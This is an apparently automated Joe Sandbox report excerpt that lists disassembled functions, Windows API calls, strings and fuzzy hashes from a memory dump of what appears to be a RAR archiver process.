Instruction Fuzzy Hash: 94E08660E3996342FF48A7F2740517412906FB4744F244038F92DC6252EE2C6C455244

Function 00007FF60E6071FC Relevance: 1.9, APIs: 1, Instructions: 353COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7b45582bae7dd69f792145e90e6da2b9b411708c317b45820f8f66ef8b840033
Instruction ID: 70a22a47efe67e778499ea276a796e4f4ac52211ee37a0f47ba5af279f2dc9b6
Opcode Fuzzy Hash: 7b45582bae7dd69f792145e90e6da2b9b411708c317b45820f8f66ef8b840033
Instruction Fuzzy Hash: D3E11221A2C6B285FB25AA20A4543BF2751EF71B88F240136FE4D8B7C6DE2DF455E710

Function 00007FF60E5C72C4 Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF60E5F915C: new.LIBCMT ref: 00007FF60E5F91CA
Part of subcall function 00007FF60E5F915C: new.LIBCMT ref: 00007FF60E5F91F2

new.LIBCMT ref: 00007FF60E5C73DE

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dd53b4dc208aec24979bed698c272dbaada3ee171b1e88622c8beb02f96d6f7f
Instruction ID: 2f1e9059e6c0247c44d7338ec4917235a3e54e76b5b25ceb579855daecd1b2af
Opcode Fuzzy Hash: dd53b4dc208aec24979bed698c272dbaada3ee171b1e88622c8beb02f96d6f7f
Instruction Fuzzy Hash: F0514773528BE194E7019F74A8441ED37A8F754F88F2C423AEA884B79ADF395062C331

Function 00007FF60E62231C Relevance: 1.6, APIs: 1, Instructions: 96COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF60E622344

Part of subcall function 00007FF60E6224D4: GetModuleHandleExW.KERNEL32 ref: 00007FF60E6224F4
Part of subcall function 00007FF60E6224D4: GetProcAddress.KERNEL32 ref: 00007FF60E62250A
Part of subcall function 00007FF60E6224D4: FreeLibrary.KERNEL32 ref: 00007FF60E62252F

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: HandleModule$AddressFreeLibraryProc
String ID:
API String ID: 3947729631-0
Opcode ID: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
Instruction ID: 62d482c4a15e060816cad5296e20828fbb557204704d583e745a9e7d4607ccb3
Opcode Fuzzy Hash: ab07719b1dbe22030e8646d784921353e02d3757405243c58476c88a44abd4a6
Instruction Fuzzy Hash: 24418021E39A6382FB689B15F86017923A1AFB0B44F749439F90DC76A1DE3CEC45A341

Function 00007FF60E5D4D1C Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetCommandLineW.KERNEL32 ref: 00007FF60E5D4D47

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: CommandLine
String ID:
API String ID: 3253501508-0
Opcode ID: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
Instruction ID: c8afef85f3bd42f6158a7b53a456223b629cd4855da8d9a4d094d1f85863ddaa
Opcode Fuzzy Hash: 73dd7db7cbad1becb968eb67897256c98e4567ab7c48d7e0ed9ada2aa3175c64
Instruction Fuzzy Hash: A501B91560C65285EA72F716A4203BE5660FFA5B94F780C31FE9D87369DE3FD4418700

Function 00007FF60E624B8C Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
Instruction ID: a7b675aaf9180ccc6637e9e0c55b754bba6df9e923f2d8d7c8aaa36d23edeb23
Opcode Fuzzy Hash: ca30e85b47fa1e18d3f1659bb3f59f1703126fc617b20a809fafb72b1d5571b6
Instruction Fuzzy Hash: 3D012C54A3DE6341FA649666BA4027911905FB4BE5F788238FD3DC62D6EE2DEC016201

Function 00007FF60E60A924 Relevance: 1.5, APIs: 1, Instructions: 41COMMON

Download Yara Rule

APIs

CompareStringA.KERNELBASE ref: 00007FF60E60A998

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: CompareString
String ID:
API String ID: 1825529933-0
Opcode ID: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
Instruction ID: c6f40607ff23e570a4bd9e3693b180cba9cc2c14be29555a54a7b8c07a9337b0
Opcode Fuzzy Hash: c6d6092b44314f1ca84e49c6934a556cb6b0378942b6d95cbaf43525491768f7
Instruction Fuzzy Hash: 0401626172DBB245EA106F52B40406AE611BBA9FC0F694834FF8D8BB9ACF3CD5425704

Function 00007FF60E5E4554 Relevance: 1.5, APIs: 1, Instructions: 31COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE ref: 00007FF60E5E4590

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: 73a3b642e027c9546b1f9f92380fcd54c99c946120ceb80f38a8122e17d5c0d2
Instruction ID: 072c107282aeb806c68932a493453b208efbe2210d1d1c9647f96a00b16a2a38
Opcode Fuzzy Hash: 73a3b642e027c9546b1f9f92380fcd54c99c946120ceb80f38a8122e17d5c0d2
Instruction Fuzzy Hash: 32F02D329086D141DB0A9B7151553F923109F16BB4F284735FE7C4B3C7DE5D90C48710

Function 00007FF60E624AB4 Relevance: 1.5, APIs: 1, Instructions: 29memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 00007FF60E624AF2

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
Instruction ID: f712ba2efaff2de349f7fef9ee4e060b37edd151a4f093de81c8023977a3d4df
Opcode Fuzzy Hash: a83705ac74b444f5500bec44348e0038c9b669d93df90df5323591eb77280fd7
Instruction Fuzzy Hash: 86F08221B7DA7341FE546AB1784027522804FB47A1F290A38FD3EC53C6DE5DEC406214

Function 00007FF60E5F38A4 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
Instruction ID: 883ea956fc618f7da90cdb97b7ad12550f6c65ce01cf819db1fd5c217c0c56a8
Opcode Fuzzy Hash: 549de7c3646322cf803f0a3d8ad362b1ba55d15b021e669189a15772740b4565
Instruction Fuzzy Hash: 89E04F60F9A32281FE5A2662287107D02411F76B80F345838EC2F86382DC1FA0991610

Function 00007FF60E62FA10 Relevance: 1.5, APIs: 1, Instructions: 10COMMON

Download Yara Rule

APIs

FreeLibrary.KERNELBASE ref: 00007FF60E62FA20

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
Instruction ID: b85b5ed19b8064ef16b4c2904c7c933ed832e6fb75c1295ea600b3270c24e20e
Opcode Fuzzy Hash: ad9dbc15abe3f0918cc6563c4feaf8e34a932a80ed0fd1217961902de98c1a45
Instruction Fuzzy Hash: DED01765E3B92286F7048B41B84433013616F75399F610634F42CC45518FADA148A200

Function 00007FF60E5E4538 Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

FindClose.KERNELBASE(00000000,?,00000000,?,00007FF60E607A8C), ref: 00007FF60E5E4549

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: CloseFind
String ID:
API String ID: 1863332320-0
Opcode ID: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
Instruction ID: 3dd4b37b3a8a692cfccdf78ba0b2968377ac15c4580972720c696df76567c572
Opcode Fuzzy Hash: a24fb093fec38f84a6413999e1ec44e694111a5c33ce1815f6d0c44c0494d0b9
Instruction Fuzzy Hash: DEC02B21E0188180C548573D98550341110BF54736FF00331F13E852F0CF1800EF0300

Function 00007FF60E5E1930 Relevance: 1.3, APIs: 1, Instructions: 29COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE ref: 00007FF60E5E1958

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
Instruction ID: a4a55a5928f912656c40744810f12b1e95da8f693dc439b1f93ed17ef4d73cfa
Opcode Fuzzy Hash: 305123b72896ec2dd4b418a3029193d626c13bb17abecb185ad3ed686754e208
Instruction Fuzzy Hash: 9AF0FF22A09A4244FB298B60E1503782650DB20B78F785730F23DC12D8DF3CD8D2C350

Non-executed Functions

Function 00007FF60E60AE50 Relevance: 23.0, APIs: 8, Strings: 5, Instructions: 281libraryloaderCOMMON

Download Yara Rule

APIs

GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF60E5C2E4C), ref: 00007FF60E60AEE9
GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF60E5C2E4C), ref: 00007FF60E60AF01
GetProcAddress.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF60E5C2E4C), ref: 00007FF60E60AF19
GetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF60E5C2E4C), ref: 00007FF60E60AF75
GetFullPathNameA.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF60E5C2E4C), ref: 00007FF60E60AFB0
SetCurrentDirectoryW.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF60E5C2E4C), ref: 00007FF60E60B23B
FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF60E5C2E4C), ref: 00007FF60E60B244
FreeLibrary.KERNEL32(?,?,00000000,?,?,00000040,?,?,00007FF60E5C2E4C), ref: 00007FF60E60B287

Strings

SMTP:, xrefs: 00007FF60E60B069
MAPISendMail, xrefs: 00007FF60E60AEDF
MAPI32.DLL, xrefs: 00007FF60E60AEC2
MAPIFreeBuffer, xrefs: 00007FF60E60AF0F
MAPIResolveName, xrefs: 00007FF60E60AEF7

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: AddressProc$CurrentDirectoryFreeLibrary$FullNamePath
String ID: MAPI32.DLL$MAPIFreeBuffer$MAPIResolveName$MAPISendMail$SMTP:
API String ID: 3483800833-4165214152
Opcode ID: 82dc930b34210fedd93bec5e1b637e758aa3da92834b2e3210ac5e6653bbd87a
Instruction ID: 168faed0d73e99bf0470746afabe4d53a7f27b097bfd64994071b48fd607c213
Opcode Fuzzy Hash: 82dc930b34210fedd93bec5e1b637e758aa3da92834b2e3210ac5e6653bbd87a
Instruction Fuzzy Hash: 28C1AE32A29BA286EB24DF61F8502BE27A0FB64B94F644035FA4E87795DF3CD505D700

Function 00007FF60E5FAF0C Relevance: 9.2, APIs: 3, Strings: 2, Instructions: 427COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FF60E5FAFA0

Part of subcall function 00007FF60E60B6D0: Sleep.KERNEL32(?,?,?,?,00007FF60E5DCBED,?,00000000,?,00007FF60E607A8C), ref: 00007FF60E60B730

swprintf.LEGACY_STDIO_DEFINITIONS ref: 00007FF60E5FB185
new.LIBCMT ref: 00007FF60E5FB18F

Strings

, xrefs: 00007FF60E5FB2B6
%ls%0*u.rev, xrefs: 00007FF60E5FB170

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: Sleepswprintf
String ID: $%ls%0*u.rev
API String ID: 407366315-3491873314
